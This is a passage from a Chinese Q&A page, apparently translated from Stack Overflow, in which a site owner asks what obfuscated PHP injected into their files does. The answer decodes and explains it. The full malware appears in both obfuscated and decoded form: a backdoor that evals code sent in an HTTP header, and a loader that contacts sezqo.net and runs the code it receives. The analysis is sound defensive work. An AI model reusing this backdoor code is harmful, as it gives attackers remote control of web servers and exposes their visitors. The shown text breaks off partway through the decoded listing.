- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
我的php文件被黑了,有人将一些编码文本注入了我的文件中。任何人都可以帮助我了解这段代码的实际作用。我无法对此进行解码。
这是该编码的代码段。
/*versio:3.01*/$II11=110426;if (!function_exists('I11lIl1I')){$GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*XJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdE8yMG9RZnBWbGhaQXRCY2ZPSFhKOEZFVER3UktOU1FpVnFoWlpxYk11VmgwN3NqZUZDdkh1WjJZdnRnTk9oZmpCWm1ibnNuUDVaaHhIeERoYXN5aE8yZHFnYThaWnZvblRGYzl5YXBvdkpBWjJ0RXRESG1kcHdKN2pnaGVHNXppSmx6aWU0YlNJWTV0NGJSS25jVkF3WHVQMVdxUmptM0RESERld3U4QjJ6b0J0QS91VmFCUGtxWnN5SGtRc2k0emp1ZTM3L3J4RlRvNDlrSEk4NHBMWi9jMk5TVjVJUmRuRVlaN3hlTU1NbnU4WUtNc1ozK1VwcWF0b012R1Q4U2hPbUlHYUVnZGVBZ2ZIOHhJVGxYdEtPUTEzZVVMSHlBTmFBaFRGczJnQVQrTEF3Z0NKNTRGQ2c2NlNKSHNLUUNpSXNpMUxxVWxjME9KUTlGazVOa0d6ZURzSXM1U3pGQUpLSHpuZm5yZmJsRmhFK1NOUGFOVWk5T1RKalg2R1ZEeURKUVZyU29weUVaTnhQUGR0ZSs2RHR4TkZOVUFVcUJDSytkNGJJQ1habG9zSFFsYkVreXNtZTJZaHNDWkswRkJxVytUeWZuSGozeTREK05jaUgvQTkzS0hyaC9WY1R5OCtUUmN0RXEzZ2JYKzl1Wmd1N3hlejVlSmlkbmVGRWlybGh3VXUvZGxzZXJsY2VwK24vdjJ5UlFhbWVDdVdvQXlQZUxhV1ExV1k4U0JNc29MVnFCaHd0dG55UDRZU2hqQlhhaWdkdityc0txck9GSmFxckVFMEZ4VlorQXZyb3FxNmtZMlZCMGNuYWVGVjIvYUIwbGMyZGYzS2lzZmVrZWJJZmtlQTI5RjJoMFdnVzRiK04xMlNGNVdGVjJwaEdvcGY1SHE1dkcwN2xnMkU3L24zRlA1ZFp3VS9KM0I0VVM2OUNrWlpMMWhGdDllM2dYOW4wVGExOFBobHVyanovRm1EMGZ1QzVhY1hQNkdtejhHNGxCZjZ0TTZuUjJ5NW82WW1WeTh5eWNrSk1kNDBOVG10MlArUWpsbEZ3OEtvUWkvVnZIQTZJOUVvazBoblVXT0FEQzltZ2oxdmsyek5ERm82MTlJcTRkNHVSYWhTdDcvWkR4V294SnNHT1hsUDJIeDlqelBaamtPVVJIdUNkdlhPQkdHR2hZOFpvVjhEYWltbVJjL0ZHZmtxUVh2QXRYM2NRc2ZtdjFrdW5iUG5ab1VxeDhIZGRBR3ArYVpZRHloNmpMM3NKRzRKdS8wK0JLaG55Z0tDZEZlY3dabnFqcmtOZjM3RkdJNEF5THRheEttSk9IWkhEQUJacTNFaG9xYmRxRzdoSkJpYUQzcWFUQTVmSVVjdXFZZ2QwTjR6WmJMZkdPNUNqemlPQ3JsaVcyN0JjNTRCL2tKOG1vejAwTnVPaWVtTXNweXR3a2Rvc0FBYlpWVVFsUUwzM3lvLzZDeW8zR1lDWEpIWXFwVDFoK2d4d2dCcStLYkVIMm8rRG9aaXVGV0lmVkFYM2h4OVROY3JlR1VjSFF6MUVOUGJ4MWdqWWh6bUMreDd6ejZ6SlJzVGVqQ2ZIWVF0Wi9BQkkxWXRtNTB1U0hWTUdBME5oa3VWNC8wT3dpSEpBWGVEZFp5ekVGYVNQNGJxZlVCWkY0anBDaUFpQ0s2OG0ya1FtTlluYndGZzd5Kytnb1hiaThVRkhGVkIyOWoxRjNtKyttTVEybDZ6MyszaWNRUE5TOXQ4czIxYkVVemkwMTBhUDFjazczS3FLWlhIZFBuNWxqN3NVNllsYVRyN1VyK2hmNEpYZXhRbElPeWc5bko1MkFHNHJOWUJsdyttcHQ1SkFCamsxZkxuMC9aVUxROXRLVlFjNElaUTVReDRleld2QW9KVmo2M3UrNnJZajlTSVUwU3hTWWlqNVRaR1ZxNCtSZkNVeDN6MUkyRjdrdElaWENna2NVeCtnUDFmR2lYTGNTbXVqVVZoaXhaSnF1bUlZQS93OGtMa2VtclVpcWt2NmtWdmo3ckRCTlRidnFzUm9hbkd5eGFSZTVKdno5M0padDNYTmkwMTdCUStXZ29PRWY0QXoyRmxXek8zcVN5dHlybCtGeXZkVXRySGYvRytWQ25RRmJneVlKcGExem1VNkh3QVFEc0lFUGdxMTFWbTFmUG1jN3VDa2M0SUVSQ25veHc5YXNMc3phbHFRYmR4TzVFMUtDSlJjUnhiUGxBT2x6cWpoMTVXdXd1TVJkOVZialM1M2UyVVVBS2ZFT3ozS3RGU0gvU3hPOElSMGFwZ3Bvc2czelZsVlR6SDNKQUZBbHNaM0hBZ3VGZTRZNDdseXVVaFlmTDNxZEh0RGNSM3pON1UwT3REZFd1QXQvWWNHY0xUK2pDK1pKdmhKdVMvblNuQ2hWYkpQWEpkNFozb0h0QWgvSjFFY2w4OFdCTTFtNzJ1U0l3c0pyWE9UM2JZVVNqWk9CUExic0J0RHZ1WUdjbzJMTmU0ZjVtd2lIQnFLUi9WRDZrZGZvaWxybHkwcEtEY3NESGM3aEtXdDcyKzE0Z2h2N3pLNnNmczgyd1hQaHIxamdCZ0RKUGRtZ1ZaR3JJOVRxM2pkV0xoTXd1dFNlUlJlN25FKzFwNCttSUJxRWVzZHlZS1VIZldXeWRNdGI0RHB0UUNxVWh5SmNJRm05UUdYVzhnVnl4TDNhb1MxaHVKaFVZRFE1MHhGSTY5NzZpKzNaVWlzZ2ZGVWo2WFMvbTdyMWdVZ0dXMStwQWROd1ZWb3EvNk5EbU1UR3EzK2g4cWFYNkIiKSkpOwWn=&kcHJlZ19yZXBsYWNl';function I11lIl1I($a, $b){$c=$GLOBALS['II11']; $d=pack('H*','6261736536345f6465636f'.'6465'); return $d(substr($c, $a, $b));};$QO0000QQ0 = I11lIl1I(3374, 16);$QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");};
最佳答案
简短答案
它向具有“ http://sezqo.net/w3.php”作为消息中继的僵尸网络或蠕虫宣布自己。此中继很可能只是以相同方式被黑客入侵的服务器。
然后,该“网络”可以将包含要执行的真实代码的请求发回(可能不是立即,而是稍后)。此代码可以替换您的网站(在所有或某些特殊情况下,脚本仅在代码之前执行),并且可以执行PHP脚本可以执行的其他任何操作。
解码和清理脚本
if (!defined("determinator")) {
if (function_exists("ini_set")) {
@ini_set("allow_url_fopen", 1);
@ini_set("display_errors", 0);
}
function w3net_feof($f, &$time = NULL) {
$time = microtime(true);
return feof($f);
}
function w3net_getfile($host, $URI) {
if (@ini_get("allow_url_fopen") == "1") {
return @file_get_contents("http://" . $host . $URI. "&w=fgc");
} elseif (function_exists("curl_init")){
$ch = @curl_init();
@curl_setopt($ch, CURLOPT_URL, "http://" . $host . $URI. "&w=cu");
@curl_setopt($ch, CURLOPT_HEADER, false);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 6);
$curl_result = @curl_exec($ch);
@curl_close($ch);
if (empty($curl_result)) {
$curl_result = "";
}
return $curl_result;
} else {
$f = @fsockopen($host, 80, $errno, $errstr, 5);
if ($f) {
$data = "";
$time = NULL;
@fputs($f, "GET {$URI}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$host}\r\n");
$useragent = PHP_OS."/".PHP_VERSION;
@fputs($f, "User-Agent: {$useragent}\r\n\r\n");
while(!w3net_feof($f, $time) && (microtime(true) - $time) < 2) {
$data .= @fgets($f, 128);
}
@fclose($f);
$parts = explode("\r\n\r\n", $data);
unset($parts[0]);
return implode("\r\n\r\n", $parts);
}
}
}
function w3net_output($key, $val) {
echo "Y_".$key.":".$val."\r\n";
}
function php_server($varname){
return @$_SERVER[$varname];
}
$version1="ftp/201309";
$version2="3.01";
$host="http://";
if (isset($_SERVER["HTTPS"])) {
if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
}
$host.=strtolower(@$_SERVER["HTTP_HOST"]);
foreach ($_GET as $key=>$val) {
if (strpos($val,"union")) {
$_GET[$key]="";
} elseif (strpos($val,"select")) {
$_GET[$key]="";
}
}
if(!isset($_SERVER["REQUEST_URI"])) {
$_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
if(isset($_SERVER["QUERY_STRING"])) {
$_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
}
}
function get_temp_directory() {
$result=dirname(__FILE__).DIRECTORY_SEPARATOR;
$tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );
foreach ($tmpdirs as $tmpdir){
if (!empty($tmpdir)){
$tmpdir.=DIRECTORY_SEPARATOR;
if (@is_writable($tmpdir)) {
$result = $tmpdir; break;
}
}
}
return $result;
}
if (strlen($host) < 10) {
define("determinator", 0);
} elseif ($requestURL=$host.@$_SERVER["REQUEST_URI"]) {
$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
$w3n_code=get_temp_directory().".".$hash;
define("determinator", $w3n_code);
$IlIlII = $w3n_code.".log";
if (@$_SERVER["HTTP_Y_AUTH"]==$hash) {
echo "\r\n";
w3net_output("versio", $version2."-".$version1."-php");
if ($code=base64_decode(@$_SERVER["HTTP_EXECPHP"])){
@eval($code);
echo "\r\n";
w3net_output("out", "ok");
}
exit(0);
}
$found = False;
$ua = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $pattern) {
if (strpos($ua, $pattern)!==False) {
$f = @fopen($w3n_code.".log", "a");
$requestURI_encoded = @urlencode(@$_SERVER["REQUEST_URI"]);
@fwrite($f, time()."\t".$pattern."\t".$requestURI_encoded."\n");
@fclose($f);
$found=True;
break;
}
}
if (@is_file($w3n_code)) {
@touch($w3n_code);
@include_once($w3n_code);
} elseif ($found === True) {
if (@touch($w3n_code)) {
$requestURL=@urlencode($requestURL);
$URI = "/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
$data = w3net_getfile("sezqo.net", $URI);
@touch($w3n_code);
}
}
} else {
define("determinator", 1);
}
}
$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
),该值通过主机名,PHP-OS(版本),版本字符串的$ version2“ 3.01”部分和一些盐“ QQ0OQ000000Q0OQ0Q”标识本地系统。
$w3n_code.".log"
命名的日志文件中,其中
$w3n_code=get_temp_directory().".".$hash;
(找到的哈希目录,附加哈希值,然后附加“ .log”)。它写了一行,由unixtimestamp,匹配的模式(标识搜索引擎)和编码的requestURI(制表符分隔)组成。我假设这是用来记录该位置预期有多少搜索引擎流量。如果那里的访问量很大,则“网站”可能已售出或可通过插入一些指向其他网站的链接来提高某些网站的页面排名。同样,将变量$ found设置为“ true”,将流量标记为“搜索引擎搜寻器”。
$w3n_code
是否存在,文件名类似于上面的日志文件,但末尾没有“ .log”。如果是这样,它将运行包含的PHP代码。
"http://sezqo.net/w3.php?u=".$requestURL."&k=".$hash."&t=php&p=".$version1."&v=".$version2
的请求来宣布自己进入网络。该请求包含$ requestURL(如何访问服务器上的此脚本),哈希键(允许进行身份验证并将脚本发送给另一个PHP脚本执行),类型“ php”以及版本字符串$ version1和$ version2。此后,它将调用touch()创建一个名为
$w3n_code
的空脚本文件。因此,此请求仅发送一次,第一个搜索引擎通过。
<?php
function get_temp_directory() {
$result=dirname(__FILE__).DIRECTORY_SEPARATOR;
$tmpdirs = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $result."tmp", $result."wp-content/uploads", $result."wp-content/cache", );
foreach ($tmpdirs as $tmpdir){
if (!empty($tmpdir)){
$tmpdir.=DIRECTORY_SEPARATOR;
if (@is_writable($tmpdir)) {
$result = $tmpdir; break;
}
}
}
return $result;
}
$version1="ftp/201309";
$version2="3.01";
$host="http://";
if (isset($_SERVER["HTTPS"])) {
if (@$_SERVER["HTTPS"] != "off") { $host="https://"; }
}
$host.=strtolower(@$_SERVER["HTTP_HOST"]);
$hash=@md5($host.PHP_OS.$version2."QQ0OQ000000Q0OQ0Q");
$w3n_code=get_temp_directory().".".$hash;
echo "FILENAMES:<br>\n";
echo $w3n_code."<br>\n";
echo $w3n_code.".log<br>\n";
?>
/*versio:3.01*/
$II11=110426;
if (!function_exists('I11lIl1I')){
$GLOBALS['II11'] = '!aW5pX3NldA$_vYWxsb3dfdXJsX2ZvcGVuZGlzcGxheV9lcnJvcnM*vZnRwLzIwMTMwOQMy4wMQasMUVEwT1EwMDAwMDBRME9RMFEoaHR0cDovLw%WSFRUUFMmb2ZmE= PaHR0cHM6Ly8gSFRUUF9IT1NUQNvdW5pb24ufcc2VsZWN0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU&kBl!xUVVFUllfU1RSSU5HKs cPwmNZGV0ZXJtaW5hdG9ypZLg*(LmxvZwoHkUSFRUUF9ZX0FVVEgYmFzZTY0X2RlY29kZQ?dmVyc2lvMLQ{%LXBocAoSFRUUF9FWEVDUEhQ=b3V0b2s{SFRUUF9VU0VSX0FHRU5ULAHICZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAS#ox~YQ^g=c2V6cW8ubmV0VtZmFzdGFkZHouY29tL3czLnBocD91PQmjlJms9!JnQ9cGhwJnA9!^*XJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYrdE8yMG9RZnBWbGhaQXRCY2ZPSFhKOEZFVER3UktOU1FpVnFoWlpxYk11VmgwN3NqZUZDdkh1WjJZdnRnTk9oZmpCWm1ibnNuUDVaaHhIeERoYXN5aE8yZHFnYThaWnZvblRGYzl5YXBvdkpBWjJ0RXRESG1kcHdKN2pnaGVHNXppSmx6aWU0YlNJWTV0NGJSS25jVkF3WHVQMVdxUmptM0RESERld3U4QjJ6b0J0QS91VmFCUGtxWnN5SGtRc2k0emp1ZTM3L3J4RlRvNDlrSEk4NHBMWi9jMk5TVjVJUmRuRVlaN3hlTU1NbnU4WUtNc1ozK1VwcWF0b012R1Q4U2hPbUlHYUVnZGVBZ2ZIOHhJVGxYdEtPUTEzZVVMSHlBTmFBaFRGczJnQVQrTEF3Z0NKNTRGQ2c2NlNKSHNLUUNpSXNpMUxxVWxjME9KUTlGazVOa0d6ZURzSXM1U3pGQUpLSHpuZm5yZmJsRmhFK1NOUGFOVWk5T1RKalg2R1ZEeURKUVZyU29weUVaTnhQUGR0ZSs2RHR4TkZOVUFVcUJDSytkNGJJQ1habG9zSFFsYkVreXNtZTJZaHNDWkswRkJxVytUeWZuSGozeTREK05jaUgvQTkzS0hyaC9WY1R5OCtUUmN0RXEzZ2JYKzl1Wmd1N3hlejVlSmlkbmVGRWlybGh3VXUvZGxzZXJsY2VwK24vdjJ5UlFhbWVDdVdvQXlQZUxhV1ExV1k4U0JNc29MVnFCaHd0dG55UDRZU2hqQlhhaWdkdityc0txck9GSmFxckVFMEZ4VlorQXZyb3FxNmtZMlZCMGNuYWVGVjIvYUIwbGMyZGYzS2lzZmVrZWJJZmtlQTI5RjJoMFdnVzRiK04xMlNGNVdGVjJwaEdvcGY1SHE1dkcwN2xnMkU3L24zRlA1ZFp3VS9KM0I0VVM2OUNrWlpMMWhGdDllM2dYOW4wVGExOFBobHVyanovRm1EMGZ1QzVhY1hQNkdtejhHNGxCZjZ0TTZuUjJ5NW82WW1WeTh5eWNrSk1kNDBOVG10MlArUWpsbEZ3OEtvUWkvVnZIQTZJOUVvazBoblVXT0FEQzltZ2oxdmsyek5ERm82MTlJcTRkNHVSYWhTdDcvWkR4V294SnNHT1hsUDJIeDlqelBaamtPVVJIdUNkdlhPQkdHR2hZOFpvVjhEYWltbVJjL0ZHZmtxUVh2QXRYM2NRc2ZtdjFrdW5iUG5ab1VxeDhIZGRBR3ArYVpZRHloNmpMM3NKRzRKdS8wK0JLaG55Z0tDZEZlY3dabnFqcmtOZjM3RkdJNEF5THRheEttSk9IWkhEQUJacTNFaG9xYmRxRzdoSkJpYUQzcWFUQTVmSVVjdXFZZ2QwTjR6WmJMZkdPNUNqemlPQ3JsaVcyN0JjNTRCL2tKOG1vejAwTnVPaWVtTXNweXR3a2Rvc0FBYlpWVVFsUUwzM3lvLzZDeW8zR1lDWEpIWXFwVDFoK2d4d2dCcStLYkVIMm8rRG9aaXVGV0lmVkFYM2h4OVROY3JlR1VjSFF6MUVOUGJ4MWdqWWh6bUMreDd6ejZ6SlJzVGVqQ2ZIWVF0Wi9BQkkxWXRtNTB1U0hWTUdBME5oa3VWNC8wT3dpSEpBWGVEZFp5ekVGYVNQNGJxZlVCWkY0anBDaUFpQ0s2OG0ya1FtTlluYndGZzd5Kytnb1hiaThVRkhGVkIyOWoxRjNtKyttTVEybDZ6MyszaWNRUE5TOXQ4czIxYkVVemkwMTBhUDFjazczS3FLWlhIZFBuNWxqN3NVNllsYVRyN1VyK2hmNEpYZXhRbElPeWc5bko1MkFHNHJOWUJsdyttcHQ1SkFCamsxZkxuMC9aVUxROXRLVlFjNElaUTVReDRleld2QW9KVmo2M3UrNnJZajlTSVUwU3hTWWlqNVRaR1ZxNCtSZkNVeDN6MUkyRjdrdElaWENna2NVeCtnUDFmR2lYTGNTbXVqVVZoaXhaSnF1bUlZQS93OGtMa2VtclVpcWt2NmtWdmo3ckRCTlRidnFzUm9hbkd5eGFSZTVKdno5M0padDNYTmkwMTdCUStXZ29PRWY0QXoyRmxXek8zcVN5dHlybCtGeXZkVXRySGYvRytWQ25RRmJneVlKcGExem1VNkh3QVFEc0lFUGdxMTFWbTFmUG1jN3VDa2M0SUVSQ25veHc5YXNMc3phbHFRYmR4TzVFMUtDSlJjUnhiUGxBT2x6cWpoMTVXdXd1TVJkOVZialM1M2UyVVVBS2ZFT3ozS3RGU0gvU3hPOElSMGFwZ3Bvc2czelZsVlR6SDNKQUZBbHNaM0hBZ3VGZTRZNDdseXVVaFlmTDNxZEh0RGNSM3pON1UwT3REZFd1QXQvWWNHY0xUK2pDK1pKdmhKdVMvblNuQ2hWYkpQWEpkNFozb0h0QWgvSjFFY2w4OFdCTTFtNzJ1U0l3c0pyWE9UM2JZVVNqWk9CUExic0J0RHZ1WUdjbzJMTmU0ZjVtd2lIQnFLUi9WRDZrZGZvaWxybHkwcEtEY3NESGM3aEtXdDcyKzE0Z2h2N3pLNnNmczgyd1hQaHIxamdCZ0RKUGRtZ1ZaR3JJOVRxM2pkV0xoTXd1dFNlUlJlN25FKzFwNCttSUJxRWVzZHlZS1VIZldXeWRNdGI0RHB0UUNxVWh5SmNJRm05UUdYVzhnVnl4TDNhb1MxaHVKaFVZRFE1MHhGSTY5NzZpKzNaVWlzZ2ZGVWo2WFMvbTdyMWdVZ0dXMStwQWROd1ZWb3EvNk5EbU1UR3EzK2g4cWFYNkIiKSkpOwWn=&kcHJlZ19yZXBsYWNl';
function I11lIl1I($a, $b){
$c=$GLOBALS['II11'];
$d=pack('H*','6261736536345f6465636f'.'6465');
return $d(substr($c, $a, $b));
};
$QO0000QQ0 = I11lIl1I(3374, 16);
$QO0000QQ0("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");
};
I11lIl1I
是否已经存在,如果不存在,它将定义该功能并执行一些代码。此函数采用两个参数$ a和$ b,它们定义了解码字符串的某些部分,该字符串稍后将在此函数中使用substr()删除。该函数获取编码文本
$GLOBALS['II11']
并将其存储在
$c
中。
$d
设置为
pack('H*','6261736536345f6465636f'.'6465')
,结果为
base64_decode
。此函数用于使用限制$ a和$ b解码从$ c切出的部分。用$ a = 3374,$ b = 16调用该函数,导致
preg_replace
存储为$ QO0000QQ0。然后调用
preg_replace("/Q0QO00QOO/e", I11lIl1I(507, 2862), "Q0QO00QOO");
。而解码功能
I11lIl1I
再次用于从编码字符串中获取某些数据($ a = 507,$ b = 2862)。
I11lIl1I(507,2862)
中的数据是:
eval(gzuncompress(base64_decode("eJyNV+tO20oQfpVlhZAtBcfOHXJ8FETDwRKNSQiVqhZZqbMuVh07sjeFCvHuZ2YvtgNOhfjBZmbnsnP5ZhxHxDhasyhO2dqga8ZZvonTFc9yapovJAZ2tEtDHmdpwJ7jgheG5ziJlzie4bSIY5t4bRKncVAwXuP1WqRjm3DDHDewu8B2zoBtA/uVaBPkqZsyHkQsi4zjue37/rxFTo49kHI84pLZ/c2NSV5IRdnEYZ7xeMMMnu8YKMsZ3+UpqatoMvGT8ShOmIGaEgdeAgfH8xITlXtKOQ13eULHyANaAhTFs2gAT+LAwgCJ54FCg66SJHsKQCiIsi1LqUlc0OJQ9Fk5NkGzeDsIs5SzFAJKHznfnrfblFhE+SNPaNUi9OTJjX6GVDyDJQVrSopyEZNxPPdte+6DtxNFNUAUqBCK+d4bICXZlosHQlbEkysme2YhsCZK0FBqW+TyfnHj3y4D+NciH/A93KHrh/VcTy8+TRctEq3gbX+9uZgu7xez5eJidneFEirlhwUu/dlserlcep+n/v2yRQameCuWoAyPeLaWQ1WY8SBMsoLVqBhwttnyP4YShjBXaigdv+rsKqrOFJaqrEE0FxVZ+Avroqq6kY2VB0cnaeFV2/aB0lc2df3KisfekebIfkeA29F2h0WgW4b+N12SF5WFV2phGopf5Hq5vG07lg2E7/n3FP5dZwU/J3B4US69CkZZL1hFt9e3gX9n0Ta18Phlurjz/FmD0fuC5acXP6Gmz8G4lBf6tM6nR2y5o6YmVy8yyckJMd40NTmt2P+QjllFw8KoQi/VvHA6I9Eok0hnUWOADC9mgj1vk2zNDFo619Iq4d4uRahSt7/ZDxWoxJsGOXlP2Hx9jzPZjkOURHuCdvXOBGGGhY8ZoV8DaimmRc/FGfkqQXvAtX3cQsfmv1kunbPnZoUqx8HddAGp+aZYDyh6jL3sJG4Ju/0+BKhnygKCdFecwZnqjrkNf37FGI4AyLtaxKmJOHZHDABZq3EhoqbdqG7hJBiaD3qaTA5fIUcuqYgd0N4zZbLfGO5CjziOCrliW27Bc54B/kJ8moz00NuOiemMspytwkdosAAbZVUQlQL33yo/6Cyo3GYCXJHYqpT1h+gxwgBq+KbEH2o+DoZiuFWIfVAX3hx9TNcreGUcHQz1ENPbx1gjYhzmC+x7zz6zJRsTejCfHYQtZ/ABI1Ytm50uSHVMGA0NhkuV4/0OwiHJAXeDdZyzEFaSP4bqfUBZF4jpCiAiCK68m2kQmNYnbwFg7y++goXbi8UFHFVB29j1F3m++mMQ2l6z3+3icQPNS9t8s21bEUzi010aP1ck73KqKZXHdPn5lj7sU6YlaTr7Ur+hf4JXexQlIOyg9nJ52AG4rNYBlw+mpt5JABjk1fLn0/ZULQ9tKVQc4IZQ5Qx4ezWvAoJVj63u+6rYj9SIU0SxSYij5TZGVq4+RfCUx3z1I2F7ktIZXCgkcUx+gP1fGiXLcSmujUVhixZJqumIYA/w8kLkemrUiqkv6kVvj7rDBNTbvqsRoanGyxaRe5Jvz93JZt3XNi017BQ+WgoOEf4Az2FlWzO3qSytyrl+FyvdUtrHf/G+VCnQFbgyYJpa1zmU6HwAQDsIEPgq11Vm1fPmc7uCkc4IERCnoxw9asLszalqQbdxO5E1KCJRcRxbPlAOlzqjh15WuwuMRd9VbjS53e2UUAKfEOz3KtFSH/SxO8IR0apgposg3zVlVTzH3JAFAlsZ3HAguFe4Y47lyuUhYfL3qdHtDcR3zN7U0OtDdWuAt/YcGcLT+jC+ZJvhJuS/nSnChVbJPXJd4Z3oHtAh/J1Ecl88WBM1m72uSIwsJrXOT3bYUSjZOBPLbsBtDvuYGco2LNe4f5mwiHBqKR/VD6kdfoilrly0pKDcsDHc7hKWt72+14ghv7zK6sfs82wXPhr1jgBgDJPdmgVZGrI9Tq3jdWLhMwutSeRRe7nE+1p4+mIBqEesdyYKUHfWWydMtb4DptQCqUhyJcIFm9QGXW8gVyxL3aoS1huJhUYDQ50xFI6976i+3ZUisgfFUj6XS/m7r1gUgGW1+pAdNwVVoq/6NDmMTGq3+h8qaX6B")));
preg_replace(...)
调用使用模式“ /.../e”,该模式在字符串
Q0QO00QOO
中查找字符串
Q0QO00QOO
,并在每次出现时执行上面的
I11lIl1I(507, 2862)
(解码后的字符串)。该代码包含
eval(gzuncompress(base64_decode(" ")));
,它再次对字符串进行base64解码,然后解压缩二进制数据并对其进行评估(=执行其php代码)。
if (!defined("determinator")) {
if (function_exists(I11lIl1I(1, 10))) {
@ini_set(I11lIl1I(14, 20), 1);
@ini_set(I11lIl1I(34, 19), 0);
}
function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
$I1lI1I = microtime(true);
return feof($Q0OOOQ);
}
function w3net_getfile($I1ll11, $I11IIl) {
$IIlI1I = "curl";
$I1IIll = $IIlI1I."_init";
if (@ini_get("allow_url_fopen") == "1") {
return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
} elseif (function_exists($I1IIll)){
$QO00QO = @$I1IIll();
$QOOOQQ = $IIlI1I."_setopt";
$IIl11I = $IIlI1I."_exec";
@$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
@$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
@$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
@$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
$IIIl1I = @$IIl11I($QO00QO);
@curl_close($QO00QO);
if (empty($IIIl1I)) {
$IIIl1I = "";
}
return $IIIl1I;
} else {
$Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
if ($Q0OOOQ) {
$I111lI = "";
$I1lI1I = NULL;
@fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
$QOOOQO = PHP_OS."/".PHP_VERSION;
@fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
$I111lI .= @fgets($Q0OOOQ, 128);
}
@fclose($Q0OOOQ);
$Q000OQ = explode("\r\n\r\n", $I111lI);
unset($Q000OQ[0]);
return implode("\r\n\r\n", $Q000OQ);
}
}
}
function w3net_output($I1I1lI, $I1lIll) {
echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
}
function php_server($Q0000Q){
return @$_SERVER[$Q0000Q];
}
$IlI11l=I11lIl1I(55, 14);
$I1lll1=I11lIl1I(69, 6);
$Q0Q0QO=I11lIl1I(78, 23);
$I1ll11=I11lIl1I(102, 10);
if (isset($_SERVER[I11lIl1I(114, 7)])) {
if (@$_SERVER[I11lIl1I(114, 7)] != I11lIl1I(122, 4)) { $I1ll11=I11lIl1I(130, 11); }
}
$I1ll11.=strtolower(@$_SERVER[I11lIl1I(142, 12)]);
foreach ($_GET as $I1I1lI=>$I1lIll) {
if (strpos($I1lIll,I11lIl1I(157, 7))) {
$_GET[$I1I1lI]=I11lIl1I(167, 0);
} elseif (strpos($I1lIll,I11lIl1I(167, 8))) {
$_GET[$I1I1lI]=I11lIl1I(167, 0);
}
}
if(!isset($_SERVER[I11lIl1I(175, 15)])) {
$_SERVER[I11lIl1I(175, 15)] = @$_SERVER[I11lIl1I(190, 15)];
if(isset($_SERVER[I11lIl1I(211, 16)])) {
$_SERVER[I11lIl1I(175, 15)] .= I11lIl1I(231, 2) . @$_SERVER[I11lIl1I(211, 16)];
}
}
function get_temp_directory() {
$I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
$Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );
foreach ($Q0Q00Q as $Q0QOOO){
if (!empty($Q0QOOO)){
$Q0QOOO.=DIRECTORY_SEPARATOR;
